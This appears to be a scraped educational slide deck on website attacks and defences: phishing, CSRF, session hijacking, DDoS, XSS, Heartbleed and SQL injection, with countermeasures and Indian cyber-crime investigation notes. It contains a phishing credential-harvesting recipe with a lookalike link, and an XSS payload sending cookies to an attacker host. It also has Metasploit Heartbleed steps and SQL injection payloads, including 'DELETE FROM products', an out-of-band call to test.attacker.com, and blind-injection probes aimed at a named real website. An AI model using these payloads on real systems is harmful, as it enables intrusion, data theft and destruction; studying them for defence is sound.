Phishing
 Spear Phishing
 Clone Phishing
 Whaling
Spear Phishing
Phishing attempts directed at specific individuals or companies have been
termed spear phishing. Attackers may gather personal information about their
target to increase their probability of success. This technique is by far the
most successful on the internet today, accounting for 91% of attacks.
Phishing Types
Clone Phishing
A type of phishing attack where a legitimate email containing an attachment or link has had its content and recipient address taken and used to create an almost identical or cloned email. The attachment or link within the email is replaced with a malicious version and then sent from an email address spoofed to appear to come from the original sender. It may claim to be a re-send of the original or an updated version of the original.
Whaling
Several recent phishing attacks have been directed specifically at senior executives and
other high profile targets within businesses, and the term whaling has been coined for
these kinds of attacks.
HERE'S HOW IT'S DONE
Step 1: Setting up a web page which looks similar to the original one.
Link: http://a0145877.xsph.ru/
Step 2: A PHP script which stores credentials to a file is what is required to harvest credentials.
Step 3: In the HTML page, search for the submit form and change it to the written PHP script.
Step 4: Host it in a server and share the link.
PHISHING: DON'T GET HOOKED
DEFINITION
It is the attempt to obtain sensitive information such as usernames, passwords, and credit card details, often for malicious reasons, by disguising as a trustworthy entity in an electronic communication.
TYPES OF PHISHING
• Spear phishing
• Clone phishing
• Whaling
• Filter evasion
• Link manipulation
• Tabnabbing
How to protect yourself
1. Be wary of emails asking for confidential information
2. Make sure you familiarise yourself with a website's privacy policy
3. Watch out for generic-looking requests for information.
4. Never submit confidential information via forms embedded within email messages.
5. Never use links in an email to connect to a website unless you are absolutely sure they are authentic. Instead, open a new browser window and type the URL directly into the address bar
6. Make sure you maintain effective software to combat phishing
PHISHING COUNTERMEASURES IN DETAIL
Auto-Generate Domain-Specific Password
Hashing of passwords with a secret key along with the website domain name.
Due to this mechanism, it becomes really hard for the attacker to get the password.
Disadvantage
• Practical implementation is quite difficult.
• Many banks use multiple domains and sub-domains
• It's a static solution
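Added example, not from the slides: a Python sketch of the domain-specific password scheme described above, where the per-site password is an HMAC of the user's master secret keyed by the site's domain, so a lookalike phishing domain receives a password that is useless on the real site. The domain-reduction rule (last two host labels), the sample domains and the function names are this example's own assumptions; the reduction rule is also where the multi-domain disadvantage from the slide shows up.

```python
import base64
import hashlib
import hmac
from urllib.parse import urlsplit


def site_key(url):
    """Reduce a URL to the part the password is bound to.
    Assumption for this example: the last two host labels. Real deployments need a
    public-suffix list, and banks spread over several domains get several passwords,
    which is the disadvantage the slide names."""
    host = (urlsplit(url).hostname or "").lower()
    labels = host.split(".")
    return ".".join(labels[-2:])


def domain_specific_password(master_secret, url, length=20):
    """HMAC(master secret, site key): one memorized secret, a different password per
    site. The site only ever sees the derived value, never the master secret, and a
    password captured on a lookalike domain does not work on the genuine one."""
    key = site_key(url)
    digest = hmac.new(master_secret.encode("utf-8"), key.encode("utf-8"),
                      hashlib.sha256).digest()
    # base64 gives a printable password; a fixed-length prefix keeps it typeable
    return base64.b64encode(digest).decode("ascii")[:length]


if __name__ == "__main__":
    secret = "correct horse battery staple"          # constructed master secret
    for url in ("https://www.bank.example/login",    # constructed domains
                "https://bank.example/",
                "https://bank-example.net/login"):    # lookalike domain
        print(url, "->", domain_specific_password(secret, url))
```

The same master secret yields identical passwords for www.bank.example and bank.example, and a different one for the lookalike, without the user having to notice the difference in the address bar.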
Web Browser’s PWD Database
Random passwords are generated and stored in the browsers.
It is more “secure,” as the browser will only give the credentials to the
right URL. If anything changes in the URL, it won’t pass credentials
Disadvantage-
•It doesn’t work fully with sub-domains.
•Even here, passwords are stored in plain text.
Phishing Scam Alert Add-ons/Extensions
The concept is like this. If the user visits any known fake/phishing URL, then the tool bar turns red.
If the site is only a suspected phishing or fake site, then it turns yellow.
2FA: Two-Factor Authentication
It requires not only a username and password, but also some additional piece of information that only the user has (e.g. a physical token).
Encrypted Key Exchange Process: Prevent Dictionary Attacks
A series of protocols are implemented for encrypted key exchange.
The key is generated by combining the shared password.
This process takes place in such a way that the phisher can't guess it.
These protocols were awkward to implement and use, and they were also too time-consuming.
Educating Your People
Conducting seminars and workshops on ethical hacking and
Internet security in order to educate their employees.
This can be a quality step towards security awareness.
Logical awareness has to be raised.
CSRF
Content
 Definition
 Attack Process
 Screenshots
 CounterMeasures
 Tools
 References
Definition
 Cross-Site Request Forgery (CSRF) is an attack that forces an
end user to execute unwanted actions on a web application in
which they're currently authenticated.
 CSRF attacks specifically target state-changing requests, not
theft of data, since the attacker has no way to see the response
to the forged request.
Definition Cont...
 With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing.
 If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth.
 If the victim is an administrative account, CSRF can compromise the
entire web application.
Process
 Root cause of CSRF
 Existing browsers do not check whether the user actually initiated an HTTP request; they attach the target site’s cookies to any request sent to it
The sequence between the browser, the target website and the malicious website:
1. Browser → Target Website: send login request
2. Target Website → Browser: return login response with cookies
3. Browser → Malicious Website: visit malicious website
4. Malicious Website → Browser: return malicious code
5. Browser → Target Website: send forged request with cookies
Screenshot
Step 1 − Let us perform a CSRF forgery by embedding JavaScript into an image. The snapshot of the problem is listed below.
Step 2 − Now we need to mock up the transfer into a 1x1 image and make the victim click on it.
Step 3 − Upon submitting the message, the message is displayed as highlighted below.
Step 4 − Now if the victim clicks the following URL, the transfer is executed, which can be seen by intercepting the user action with Burp Suite. We can see the transfer by spotting it in the GET request as shown below.
Step 5 − Now upon clicking refresh, the lesson completion mark is shown.
Tool – OWASP CSRF Tester
Test your applications for CSRF
- Record and replay transactions
- Tune the recorded test case
- Run the test case with an exported HTML document
Test case alternatives
- Auto-Posting Forms
- Evil iFrame
- IMG Tag
- XMLHTTPRequest
- Link
Counter Measures
 The web application should insert random values, tied to the specific user’s session, into the forms it generates
 The web application should re-authenticate users every time they are about to perform a particularly dangerous operation
Counter Measures Cont..
Safe Methods
1) The GET and HEAD methods SHOULD NOT have the significance of taking an action other than retrieval. These methods ought to be considered "safe" ...
   Read state-changing parameters from the $_POST superglobal, not from $_GET or $_REQUEST
2) Try to force the use of your own forms
- On form generation, store a unique token in the user’s $_SESSION and in a hidden form field
- On submit, check the token
-- Limits the attack to a single user
-- The attacker would need to obtain the user’s valid form AND session token
- Put an expiry on form tokens
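As an added example (not code from the slides), the token countermeasure above in Python: the `session` dict stands in for $_SESSION and the `post` dict for $_POST; the function names and the 15-minute expiry are assumptions.

```python
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # constructed expiry for form tokens


def generate_form_token(session, form_name, now=None):
    """Create a random token, store it in the server-side session (the page's
    $_SESSION) keyed by form name, and return it for the hidden form field."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    session.setdefault("csrf_tokens", {})[form_name] = {"value": token, "issued": now}
    return token


def verify_form_token(session, form_name, submitted, now=None):
    """Check a submitted token against the session copy. The stored token is
    removed whether or not the check passes, so a replayed form is rejected."""
    now = time.time() if now is None else now
    record = session.get("csrf_tokens", {}).pop(form_name, None)
    if record is None or submitted is None:
        return False
    if now - record["issued"] > TOKEN_TTL_SECONDS:
        return False  # expired token
    # constant-time comparison so the check itself leaks nothing about the token
    return hmac.compare_digest(record["value"], submitted)


def render_transfer_form(session):
    """Form generation: the token is tied to this user's session only."""
    token = generate_form_token(session, "transfer")
    return (
        '<form method="POST" action="/transfer">\n'
        f'  <input type="hidden" name="csrf_token" value="{token}">\n'
        '  <input name="to"> <input name="amount">\n'
        '  <button>Transfer</button>\n'
        '</form>'
    )


def handle_transfer(session, method, post, now=None):
    """Server side of the state-changing request. Only POST is honoured (GET
    stays "safe") and only $_POST-style parameters are read."""
    if method != "POST":
        return "405 method not allowed"
    if not verify_form_token(session, "transfer", post.get("csrf_token"), now):
        return "403 invalid or missing CSRF token"
    return f"200 transferred {post['amount']} to {post['to']}"
```

A forged request from another origin cannot include the hidden token, because the attacker never sees the form the victim's session generated.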
Session HIJACKING
What is session hijacking ?
Session hijacking is the process of exploiting a valid computer session, which typically involves stealing the victim's cookie.
What is a cookie ?
• A cookie, also known as a web cookie or HTTP cookie, is a small piece of text stored by the user’s browser.
• A cookie is sent as a header by the web server to the web browser on the client side.
• A cookie is static and is sent back by the browser unchanged every time it accesses the server.
Types of session hijacking
1 ) Active : -
In an active attack, an attacker finds an active session and takes over.
2 ) Passive : -
In a passive attack, an attacker hijacks a session, but sits back, watches and records all the traffic that is being sent back and forth.
Session hijacking working…
Showing video example of session hijacking
Session Hijacking
• Levels of Session Hijacking
• Session Hijacking Steps
• Session Hijacking Tools
• Types of Session Hijacking
• Countermeasures
Steps in Session Hijacking
Place yourself between the victim and the target
(you must be able to sniff the network)
Monitor the flow of packets
Predict the sequence number
Kill the connection to the victim’s machine
Take over the session
Start injecting packets to the target server
Types of Session Hijacking
There are two types of session hijacking attacks:
Active
• In an active attack, an attacker finds an
active session and takes over
Passive
• With passive attack, an attacker hijacks a
session, but sits back, and watches and
records all the traffic that is being sent
forth
Session Hijacking Levels
Session hijacking takes place at two levels:
• Network Level Hijacking
• Application Level Hijacking
Network-level hijacking is the interception of packets in transit between the client and the server in a TCP or UDP session.
Application-level hijacking is gaining control of an HTTP user session by obtaining the session ID.
Some common tools used for Session Hijacking
The following are a few that belong to this category:
• Juggernaut
• Hunt
• TTY Watcher
• IP Watcher
• T-Sight
• Paros HTTP Hijacker
Counter Measures for Session Hijacking
• Use encryption
• Use secure protocols (SSL and HTTPS)
• Limit incoming connections where possible
• Minimize remote access
• Set a time-out so the session expires when inactive
• Expire the session if the browsing user agent changes
• Provide logout functionality
Counter Measures for Session Hijacking (Cont….)
• Create a new session ID after a successful login
• Use long session IDs
• Force re-authentication or step-up authentication
• Use CAPTCHA
• Educate the employees
• Expire the session if the operating system changes
• Expire the session if the device changes (Web Socket)
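An added Python example, not part of the original deck, that puts several of the countermeasures above into one small server-side session store: long random IDs issued only at login (any ID presented before login is discarded), idle time-out, expiry when the user agent changes, explicit logout, and forced re-authentication after a fixed session age. The class, the time-outs and the cookie name are constructed for this example.

```python
import secrets
import time

IDLE_TIMEOUT = 15 * 60   # constructed: seconds of inactivity before a session expires
REAUTH_AFTER = 10 * 60   # constructed: session age after which sensitive actions re-authenticate
SESSION_ID_BYTES = 32    # 256 bits of randomness: a "long session ID"


class SessionStore:
    """Server-side session table, constructed for this example (not a framework API)."""

    def __init__(self):
        self._sessions = {}

    def login(self, presented_sid, username, user_agent, now=None):
        """Called only after the password (and any second factor) has been verified.
        Any session ID the client presented before login is dropped and a fresh one
        issued, so an ID planted in the victim's browser beforehand is worthless."""
        now = time.time() if now is None else now
        if presented_sid is not None:
            self._sessions.pop(presented_sid, None)
        sid = secrets.token_urlsafe(SESSION_ID_BYTES)
        self._sessions[sid] = {"user": username, "ua": user_agent,
                               "created": now, "last_seen": now}
        return sid

    def lookup(self, sid, user_agent, now=None):
        """Resolve a presented session ID to a username, or None.
        The session is destroyed if it has been idle too long or is presented from
        a different user agent than the one that logged in."""
        now = time.time() if now is None else now
        s = self._sessions.get(sid)
        if s is None:
            return None
        if now - s["last_seen"] > IDLE_TIMEOUT or s["ua"] != user_agent:
            self.logout(sid)
            return None
        s["last_seen"] = now
        return s["user"]

    def needs_reauth(self, sid, now=None):
        """True when a dangerous operation should ask for the password again."""
        now = time.time() if now is None else now
        s = self._sessions.get(sid)
        return s is None or now - s["created"] > REAUTH_AFTER

    def logout(self, sid):
        """Explicit logout removes the ID server-side, so a stolen copy is useless afterwards."""
        self._sessions.pop(sid, None)

    @staticmethod
    def cookie_header(sid):
        """Cookie attributes: sent only over HTTPS, unreadable by page scripts,
        not attached to cross-site navigations."""
        return f"Set-Cookie: SESSIONID={sid}; Secure; HttpOnly; SameSite=Lax; Path=/"
```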
Distributed Denial
of Service
What is Distributed Denial of Service?
 A denial-of-service attack (DoS attack) is a cyber-attack where the
perpetrator seeks to make a machine or network resource unavailable to
its intended users by temporarily or indefinitely disrupting services of
a host connected to the Internet. Denial of service is typically
accomplished by flooding the targeted machine or resource with
superfluous requests in an attempt to overload systems and prevent some
or all legitimate requests from being fulfilled.
Types of DDoS
Volume Based Attacks
 Includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (bps).
Protocol Attacks
 Includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment such as firewalls and load balancers, and is measured in packets per second.
Application Layer Attacks
 Includes low-and-slow attacks, GET/POST floods, attacks that target Apache, Windows or OpenBSD vulnerabilities, and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in requests per second.
LIVE DEMO
Prevention and Mitigation Strategy
 The first thing to do in DDoS mitigation is to identify normal conditions for network traffic by defining “traffic patterns”, which is necessary for threat detection and alerting. DDoS mitigation also requires classifying incoming traffic to separate human traffic from human-like bots and hijacked web browsers. This is done by comparing signatures and examining different attributes of the traffic, including IP addresses, cookie variations, HTTP headers, and JavaScript footprints.
 One technique is to pass network traffic addressed to a potential target network through high-capacity networks with "traffic scrubbing" filters.
Law and Investigations
INVESTIGATION
Challenges in the investigation of Cyber Crime (Website Crime)
Investigation of cyber-crimes is different from conventional investigation because:
 The incident takes place in the virtual world
 It is borderless/transnational
 There are issues of jurisdiction
 There is the issue of connecting the accused with the machine/computer
 There is a lack of enthusiasm in reporting cyber crime
The essential Requirements for Investigation are:
 Immediate Reporting of Breaches.
 Adequate Tools.
 Trained Investigators.
 Computer Literate Witness.
 Assistance of Forensic Experts.
 Immediate investigation.
Common Procedure of Web Site Crime investigation
 WHOIS and domain details: if a domain is active it must have a working email address and payment details. Contact the registrar, who can give the domain’s IP address, cell number and payment instrument.
 The email ID used for the hosting server (purchase/sale) is important because police can obtain the email ID, creation IP, alternate email ID, cell number and IP logs.
 A Law Enforcement Agency in India can demand information such as IP logs and login credentials of the accused for investigation through Section 91 of CRPC 1973; for detailed information on Section 91 of CRPC 1973 kindly refer to the annexure.
 The Law Enforcement agencies can perform a detailed investigation of cyber crime cases through the Internet Protocol Data Record (IPDR) of the network used. The IPDR can be obtained from the ISP of the concerned network. A sample IPDR is shown in the figure.
FIGURE : Sample Of Notice under 91 Crpc 1973.
Figure : Sample of IPDR
Crimes and Laws Relating to Websites
 Harassment via fake public profile on social networking site.
 Online Hate Community.
 Email Account Hacking.
 Web Defacement.
 Introducing Viruses, Worms, Backdoors, Rootkits, Trojans, Bugs.
 Cyber Terrorism.
 Phishing and Email Scams.
 Theft of Confidential Information.
WEBSITE HACKING CASE STUDY
 Hacking and defacement of Assam police website.
 Hacker hacks into a financial website.
 Indian Army website hacked.
 ISRO Website Hack.
 Bazee.com
 E-Bay Account Takeover
 Incometaxpune.Com Redirection To Pornographic Content
Website hacking and prevention (All Tools,Topics & Technique )

More Related Content

Website hacking and prevention (All Tools,Topics & Technique )

  • 4. Static Websites • Quick to develop • Easy to host • More secure • Less easily hackable • Requires web development expertise to update site • Site not as useful to the user • Content can get stagnant Dynamic Websites • Slower/Expensive to develop • Hosting Costs a little more • Less Secure • Prone to hacking • Much more functionalities • Easy to update • New content brings people back to the site and helps in the search engines • Can work as a system to allow staff or users to collaborate Types of Websites
  • 8. Website Technologies • Markup Languages HTML CSS XML • Programming and Scripting Languages JavaScript VBScript Php C# Perl Asp.net • Web Servers Internet Information Services (IIS) Apache • Databases SQL Server MYSQL
  • 9. Ever come across a screen like this??
  • 15. URL HIJACKING Make money from your mistake They buy badly spell domain Redirect from the famous URLs Fake website or phishing site Infect with a drive by download
  • 18. STROKEJACKING It is extremely similar to clickjacking, in that a malicious site has a user doing things they don’t want to do. Except, this time, it’s with the keyboard instead of the mouse – hence the “stroke”. The attacking site gets the user to type (or cut and paste), the information they’re looking for. This could lead to another attack (if the user types JavaScript), or just gathering a username and password. The user thinks they are logging into a site, but they’re really sending characters over to the attacker’s site. TAPJACKING • A hacking technique where a malicious application presents an unreal user interface in order to obtain user events for a hidden action in the background. • Like Clickjacking on the web, Tap Jacking occurs when a malicious application displays a fake user interface that seems like it can be interacted with, but actually passes interaction events such as finger taps to a hidden user interface behind it. • Mostly the tap jacking technique is used for mobile application and mobile websites
  • 21. Tools and Techniques Required to Perform Attacks  WHOIS  Robots.txt files  HTTrack-clone a website  BeEF Tool  Electronic Data Gathering, Analysis and Retrieval (EDGAR)  Shodan Search  Google Hacking  DNS Lookup  Nslookup  DIG (Domain information Groper)  Netcraft  Httprint  Fierce  Encoder and Decoder
  • 24. XSS
  • 25. Content  Definition  Types  Process  Live Attack  Risks  Counter Measures
  • 26. Definition  Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications.  XSS enables attackers to inject client-side scripts into web pages viewed by other users.  A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
  • 27. XSS Types  Persistent (Stored) Stored or Persistent XSS is a kind of XSS vulnerability where the untrusted user input is processed and stored by the server in a file or database without any validation and this untrusted data is fetched from the storage and is reflected back in response without encoding or escaping resulting in permanent code execution at the browser whenever the stored data is reflected in the response. - link in other website or email
  • 28. XSS Types  Non Persistent (Reflected) Reflected or Non-Persistent XSS is a kind of XSS vulnerability where the untrusted user input is immediately processed by the server without any validation and is reflected back in the response without encoding or escaping resulting in code execution at the browser. - forum, bulletin board, feedback form
  • 29. XSS Types  Local (DOM based) DOM Based XSS is a form of client side XSS which occurs in an environment where the source of the data is in the DOM, the sink is also in the DOM, and the data flow never leaves the browser. It occurs when an untrusted data is given at the source is executed as a result of modifying the DOM “environment” in the browser. DOM XSS occurs when the untrusted data is not in escaped or encoded form with respect to the context. - PDF Adobe Reader, Flash Player
  • 31. Screenshot 1)An attacker finds an xss hole in a web application
  • 32. 2) The attacker creates an attack URL for stealing sensitive Information and disguises it so that it appears legitimate. Here it is, <script> document.location = ”http://localhost/attacker.com/redirect.php?a=” + document.cookie</script> 3) The attacker distributes the malicious XSS link via social engineering to unsuspected users.
  • 33. Screenshot 4) When the victim logs in, Javascript embedded with the malicious XSS link executes and transmits the victim’s login information to the attacker.
  • 35. XSS Risks XSS can 1) Steal Cookies - Hijack of user’s session - Unauthorized acess 2)Spy on what you do 3)Modify the content of web page by - Inserting images or words - Misinforming - Spreading Bad Reputation 4)Network Mapping 5)XSS viruses
  • 36. XSS Countermeasures 1) Content Filtering: “The application may attempt to detect and remove all scripts from un- trusted HTML before sending it to the browser.” Content filtering is otherwise known as sanitization. This defense technique uses filter functions to remove potentially malicious data or instructions from user input. Filter functions are applied after user input is read by a web application, but before the input is employed in a operation or output to the web browser. Removal of scripts from un-trusted content is a difficult problem for web applications that permit HTML markup in user input such as blog. To be completely effective in eliminating XSS, a filter function must necessarily model the full range of parsing behaviors pertaining to script execution for several browsers.
  • 37. XSS Countermeasures Challenges of Content Filtering: Allowing all benign HTML user input, while simultaneously blocking all potentially harmful scripts in the un-trusted output. Every control character that can be used to introduce attack code also has a legitimate use in some benign, non-script context. For example, the ' < ' character needs to be present in hyperlinks and text formatting, and the ' " ' character needs to be present in generic text content. Both are legitimate and allowed user inputs, but can be abused to mount XSS attacks. Browser behavior vary from browser to browser, they are complex to model, not entirely understood and not all known (especially for closed source browsers like Microsoft internet explorer). Therefore, from a web application perspective, the task of implementing correct and complete content filter functions is very difficult, if not impossible.
  • 38. XSS Countermeasures 2) Browser Collaboration: “The application may collaborate with the browser by indicating which scripts in the web page are authorized, leaving the browser to ensure the authorization policy is upheld.” Robust prevention of XSS attacks can be achieved if web browsers are made capable of distinguishing authorized from unauthorized scripts. This approach can be implemented by (a) creating a server–browser collaboration protocol to communicate the set of authorized scripts, then (b) modifying the browser to understand this protocol and enforce a policy denying unauthorized script execution.
  • 39. XSS Countermeasures Challenges of Browser Collaboration: Although this defense strategy is compelling and effective long term solution, but its implementation will take long time because web applications adopting this approach require their users to employ modified browsers for protection from XSS attacks. To implement this there must be agreement on some standards for server browser collaboration, then these new standards must be incorporated in the normal browser implementation. This is a long, complicated process that can take several years. Ex: Browser-Enforced Embedded Policies (BEEP)
  • 41. Heartbleed is a security bug in the OpenSSL cryptography library.
  • 42. OpenSSL is a software library to be used in applications that need to secure communications over computer networks against eavesdropping or need to ascertain the identity of the party at the other end. It has found wide use in internet web servers, serving a majority of all web sites. OpenSSL contains an open-source implementation of the SSL and TLS protocols.
  • 44. The Secure Sockets Layer (SSL) and Transport Layer Security (TLS) is the most widely deployed security protocol used today. It is essentially a protocol that provides a secure channel between two machines operating over the Internet or an internal network.
  • 45. What happened..??  Vulnerability Heartbleed was announced to the world on 7th April 2014, as OpenSSL vulnerability and with a new code release ( 1.0.1g)  It was found by Google security Team and Condenomicon  Told that Private keys to SSL certificates could be exposed  Many Big name companies were vulnerable; Big tech names, Banks, law enforcement, Intelligence Agencies  But...
  • 46. What is heartbeat extension?  Heartbeat is an echo functionality where either side (client or server) requests that a number of bytes of data that it sends to the other side be echoed back.  The idea appears to be that this can be used as a keep- alive feature, with the echo functionality presumably meant to allow verifying that both ends continue to correctly handle encryption and decryption
  • 48. Background The Heartbleed vulnerability is possibly the worst thing that ever happened to online trust. Ironically, Heartbleed makes HTTPS less secure than plain HTTP because attackers can obtain sensitive data without even having to intercept traffic. Initial reactions focused on : • patching vulnerable web servers, • revoking SSL certificates • changing user passwords. It took a couple more days to realize that Heartbleed also affects client software, non-web SSL traffic and countless embedded devices which will never receive a software update.
  • 49. Lets see how to perform this attack with Metasploit..!!
  • 50.  It can be performed with powerful exploit framework, Metasploit  We'll see how it's performed step by step  Step 1: Update Metasploit using msfupdate  Step 2: Start metasploit  Kali > msfconsole
  • 52.  Step 3 : Find Heartbleed  search heartbleed  This would bring up two modules  auxiliary/scanner/ssl/openssl_heartbleed  and  auxiliary.server/openssl_heartbeat_client_me mory  We'll use first one
  • 54. Step 4  Use Auxiliary module  use auxiliary/scanner/ssl/openssl_heartbleed  This will load the heartbleed module
  • 55. info  Type msf > info  This reveals the options that need to set in order to use this module and a description of the module
  • 57. Step 5  Set options  Although this module has numerous option, the critical one is RHOSTS  Let's set it to a target website on network that is still vulnerable to heartbleed  msf > set RHOSTS 192.168.1.169
  • 59. Step 6 : Run the module  Finally, set the option 'verbos' to 'true'. This will provide us with verbos output. Msf > set verbos true  And lets run it msf > run  As we can see in next screenshot , the server leaked about 64k bytes of what was in it's memory
  • 61. Let Us Define…. • Alice, Bob: Users of online services. • Eve: A passive attacker (eavesdropper). • Trudy: An active attacker who may exploit the Heartbleed bug by sending specially crafted heartbeat packets over an SSL (e.g.HTTPS) connection. • yuri.com: A web site with vulnerable SSL software. Since OpenSSL is so widely used, any web site should be considered as a potential yuri.com until proven otherwise.
  • 63. 1 Extraction of sensitive data from vulnerable HTTPS servers In this scenario Alice enters or consults sensitive data on yuri.com over HTTPS. Plain-text data linger in the memory of the web server. Later, Trudy connects as a regular HTTPS clients and exploits Heartbleed. Countermeasures for end users • Do not exchange sensitive information with a web site until they tell you they have dealt with Heartbleed. Field reports • Canadian charged in 'Heartbleed' attack on tax agency.
  • 64. 2. Session hijacking from vulnerable HTTPS servers In this scenario Trudy extracts session cookies rather than login credentials. This allows her to take control of Alice's account without waiting for her to enter her credentials. Countermeasures for end users • Log out of online services until they have dealt with Heartbleed.
  • 65. 3. Extraction of SSL private keys from vulnerable HTTPS servers In this scenario Trudy extracts the SSL/TLS private key of yuri.com. Regardless of what happens next, leakage of private keys is always a major failure. Lessons learned • Protect private keys with a hardware security module. Field reports • Confirmed: Heartbleed Exposes Web Server's Private SSL Keys
  • 66. 5. Tor traffic correlation Eve, an evil dictator, wants to establish that Alice is using Tor to communicate with george.com, a foreign human- rights organization. Eve can spy on all Internet traffic within her national boundaries but has no wiretapping authority in other countries. She exploits Heartbleed massively against vulnerable Tor exit nodes in order to match outgoing traffic with her local intercepts.
  • 67. 4. Man-in-the-middle impersonation of online services In this scenario mallory.com impersonates yuri.com after extracting its SSL private key. This so-called man-in-the- middle attack (MITM) is more dangerous than passive snooping because mallory.com can trick Alice into using a compromised certificate. It also allows mallory.com to defeat some multi-factor security measures. Countermeasures for end users • Check whether your browser detects revoked certificates. • If it does not, inspect certificates manually. Lessons learned • Heartbleed will probably be the end of the current certificate revocation infrastructure.
  • 68. 6. De-anonymization of hidden servers and users by malicious Tor nodes Trudy sets up a number of malicious Tor guard node. She exploits the Heartbleed vulnerability against clients that connects to them, including Tor hidden servers and their users. Although Tor hidden services are encrypted end-to- end, Trudy can identify vulnerable users and servers based on plaintext data leaked by Heartbleed at each end. Besides, if she extracts the private key of a hidden service, she can impersonate it. Field reports • "Tor hidden services might leak their long-term hidden service identity keys to their guard relays."
  • 69. 7. Attacks against VPN servers Alice is aware that most public WiFi networks provide no privacy. Therefore she has configured her smartphone and laptop to connect to the Internet through a VPN service provider, yuri.com. (Alternatively, she could be running her own VPN server at home, or using the VPN feature that comes bundled with her DSL modem or her NAS box.) Eve snoops on the WiFi network that Alice is currently using, notices SSL-based VPN traffic from her smartphone, exploits Heartbleed against the destination IP address, and retrieves either VPN keys or plaintext traffic. Field reports • Attackers Exploit the Heartbleed OpenSSL Vulnerability to Circumvent Multi-factor Authentication on VPNs • OpenVPN uses OpenSSL as its crypto library by default and thus is affected
  • 70. Some General Countermeasures  Do not use OpenSSL 1.0.1f.  Disable heartbeat extension.  Change login credentials if your site is compromised.
  • 71. DANGER : OpenSSL, an open source project staffed by only 10 individuals and run on a limited budget, is used to secure millions of servers, ensuring the integrity of email, e- commerce, online banking and other properties, in many cases for multi-billion dollar companies. Heartbleed obviously has wide-reaching implications, not only for the integrity of the Web, but also for mobile apps – but how much damage did it actually do prior to its discovery and patching?
  • 72. How damaging is Heartbleed?
  • 73. The issue has also spread to mobile devices. Android apps, for instance, may connect to servers that could be affected by Heartbleed. While not dedicated browsing tools such as Google Chrome or Apple Safari, some of these apps have their own internal browsers, blurring the line between mobile software and the Web. That risk is worth noting, not just for the OpenSSL exploit but for future considerations about overall Internet security.
  • 75. These weaknesses are all addressable, and the speed with which companies and security experts have acted has been encouraging. Still, the community will have to stay on its toes to protect the emerging Internet of Everything from OpenSSL and future bugs.
  • 77. What is SQL? SQL (Structures Query Language) is a programming language to manage database. The managements systems that employ SQL are Microsoft SQL Database, Oracle, MySQL, PostgreSQL, and others.
  • 78. What is SQL Injection SQL injection i.e. SQLI refers to the injection attack in which the attacker executes malicious SQL queries that control a web application database server The attacker can use SQL injection to :  Add, delete, edit or read content from the database  Read source code from files on the database server  Write files to the database server
  • 79. Classification of SQL injections There are 3 major classifications: 1. In-band SQLi (Classic SQLi) 2. Inferential SQLi (Blind SQLi) 3. Out-of-band SQLi
  • 80. In-Band SQLi Or Classic Attacks Most attacks rely on basic SQL manipulation and are considered to be classic attacks. It includes  WHERE clause modification  UNION operator injection  query stacking
  • 81. WHERE Clause Manipulation: Any user input generally end up in a WHERE Clause of the data base Example: In a login page where username is entered the SQL query looks like this:  SELECT * FROM users WHERE name = '" + userName + "';  if the "userName" variable is crafted in a specific way,the SQL statement may do more than the code author intended.setting the "userName" variable as: ' OR '1'='1  or using comments to even block the rest of the query ' OR '1'='1' – These user inputs renders the SQL Query like the following  SELECT * FROM users WHERE name = '' OR '1'='1';  SELECT * FROM users WHERE name = '' OR '1'='1' -- ';
  • 83. SQL injection Using UNION: The UNION operator allows the attacker to extract sensitive information from the database.  Example: USER INPUT:  ' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a GENERATED QUERY:  SELECT id, name, description FROM products WHERE category = '' AND 'a'='b' UNION SELECT 999, 'abc', 'xyz' FROM members WHERE 'a'='a‘ The crafted query returns usernames and passwords of all members in the database.
  • 84.  Query stacking:Stacked queries provide a lot of control to the attacker. By terminating the original query and adding a new one, it will be possible to modify data and call stored procedures.  Example A classic attack using this technique could look like the following. MALICIOUS USER INPUT:  1; DELETE FROM products GENERATED QUERY WITH MULTIPLE STATEMENTS:  SELECT * FROM products WHERE productid=1; DELETE FROM products
  • 85. Inference SQLi attack The main intent of the attacker in an inference SQLi is identifying the injectable parameters, extracting database schema. Here no data is actually transferred via the web application and the attacker would not be able to see the result of an attack in-band. It is also referred as Blind injection attack There are two well-known attack techniques that are based on inference:  Boolean-Based-Blind Injection  Time-based-blind Attacks
  • 86. Boolean-based-Blind Injection: Information is inferred from the behaviour of the page by asking the server true/-false questions. If the injected statement evaluates to true, the site continues to function normally. If the statement evaluates to false, although there is no descriptive error message, the page differs significantly from the normally-functioning page. Example: In this website it shows some information which is stored in some database http://www.psn.com.pk/index.php?page=gallery.php&id=519 The attacker finds the vulnerability using Boolean based blind injection False query: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=2 True query: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and 1=1
  • 89. Timed-based-blind attack: For Time-based attacks, the attacker needs to instruct the database to perform a time-intensive operation. If the web site does not return a response immediately, the web application is vulnerable to Blind SQL Injection. A popular time intensive operation is the sleep operation. Example: In the website http://www.psn.com.pk/index.php?page=gallery.php&id=519 To perform time based blind attack the query will become: http://www.psn.com.pk/index.php?page=gallery.php&id=519 and if(1=1, sleep(10), false)
  • 91. Out-of-band SQLi  Out-of-band attack occurs when the attacker is unable to the same channel to attack and gather result  Out-of-band techniques, offer an attacker an alternative to inferential time-based techniques, especially if the server responses are not very stable. Consider the following URL crafted by an attacker: https://example.com/products.aspx?id=1;EXECmaster..xp_dirtree 'test.attacker.com' – This will produce the following SQL query.  SELECT * FROM products WHERE id=1;EXEC master..xp_dirtree 'test.attacker.com' --
  • 92.  What happened is that there are now two separated queries that SQL Server will execute. /* First Query */  SELECT * FROM products WHERE id=1 /* Second Query */  EXEC master..xp_dirtree 'test.attacker.com' –  The second query is invoking a stored procedure xp_dirtree. This extended stored procedure can be used to get a list of all the folders for the folder named in the xp.
